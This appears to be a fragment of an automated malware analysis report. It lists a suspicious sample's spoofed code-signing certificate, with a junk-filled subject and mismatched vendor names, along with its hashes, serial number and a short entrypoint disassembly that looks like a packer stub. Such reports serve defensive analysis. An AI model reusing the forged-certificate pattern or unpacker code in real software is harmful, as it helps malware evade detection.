Subject Chain	C=6G Bluetooth, L="\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7\xa2\xd6\xd9\u2122\xa3\xe7\xbf\u2122<k_\xa7", OU=Universal Gen Core Pentium, O=" Intel", CN=SAMSUNG PRO B960-P WIFI DDR6
Version:	3
Thumbprint MD5:	A71E98477F66B5991209358E4D59B768
Thumbprint SHA-1:	7840965364ACC94C165B719AC619B0EA9DBE3633
Thumbprint SHA-256:	8A50D7355211FFAE0968AB6A41E52C3224A676593EBA772C0162D279DCC56830
Serial:	4AB6F2CAD3E6414AAC7D421A956D711F

Entrypoint Preview

Instruction
call 00007F7F0C808DD7h
inc ecx
push edx
dec ecx
mov edx, esp
inc ecx
push edx
dec ecx
mov esi, dword ptr [edx+10h]
dec ecx
mov edi, dword ptr [edx+20h]
cld
mov dl, 80h
mov al, byte ptr [esi]
dec eax
